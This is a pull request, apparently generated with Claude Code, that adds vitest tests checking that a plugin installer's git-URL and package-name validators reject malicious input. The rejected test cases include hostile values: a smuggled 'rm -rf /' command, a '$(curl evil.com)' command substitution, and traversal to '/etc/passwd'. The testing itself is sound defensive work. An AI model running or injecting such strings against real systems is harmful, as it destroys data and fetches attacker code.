### PR TITLE
test(agent): cover the plugin-install input validators (#8801, #9943)

### DIFF
--- a/packages/agent/src/services/plugin-installer.test.ts
+++ b/packages/agent/src/services/plugin-installer.test.ts
@@ -1,0 +1,49 @@
+import { describe, expect, it } from "vitest";
+import { assertValidGitUrl, assertValidPackageName } from "./plugin-installer";
+
+/**
+ * Tests for the plugin-install input validators (#8801 / #9943). A malicious git
+ * URL or package name fed to the installer is a remote-code-execution vector, so
+ * assertValidGitUrl / assertValidPackageName must reject injection, SSH, and path
+ * traversal — they were untested.
+ */
+describe("assertValidGitUrl", () => {
+  it("accepts a well-formed https .git URL", () => {
+    expect(() => assertValidGitUrl("https://github.com/elizaos/eliza.git")).not.toThrow();
+    expect(() => assertValidGitUrl("https://gitlab.com/group/sub/repo.git")).not.toThrow();
+  });
+
+  it("rejects non-https, missing .git, SSH, and injection attempts", () => {
+    for (const u of [
+      "http://github.com/x.git",
+      "https://github.com/x",
+      "git@github.com:x/y.git",
+      "https://github.com/x.git; rm -rf /",
+      "https://$(curl evil.com).git",
+      "https://github.com/x.git evil",
+    ]) {
+      expect(() => assertValidGitUrl(u)).toThrow(/Invalid git URL/);
+    }
+  });
+});
+
+describe("assertValidPackageName", () => {
+  it("accepts plain and scoped package names", () => {
+    for (const n of ["lodash", "plugin-foo", "@elizaos/plugin-bar", "@scope/name.sub"]) {
+      expect(() => assertValidPackageName(n)).not.toThrow();
+    }
+  });
+
+  it("rejects traversal, injection, and malformed scopes", () => {
+    for (const n of [
+      "../../etc/passwd",
+      "foo/bar",
+      "foo; rm -rf /",
+      "@/missing-scope",
+      ".hidden",
+      "name with space",
+    ]) {
+      expect(() => assertValidPackageName(n)).toThrow(/Invalid package name/);
+    }
+  });
+});


### PR DESCRIPTION
A malicious git URL or package name fed to the plugin installer is an **RCE vector**. `assertValidGitUrl` / `assertValidPackageName` must reject injection, SSH, and path traversal — and were untested.

**4 tests (multiple cases each):**
- `assertValidGitUrl` accepts a well-formed `https …​.git` URL; rejects non-https, missing-`.git`, SSH (`git@`), **shell injection** (`; rm`), **command substitution** (`$(…)`), and embedded spaces;
- `assertValidPackageName` accepts plain + scoped names; rejects **traversal** (`../../etc`), an unscoped slash (`foo/bar`), injection, an empty scope (`@/x`), a leading dot, and a space.

Net-new, RCE-prevention.

🤖 Generated with [Claude Code](https://claude.com/claude-code)
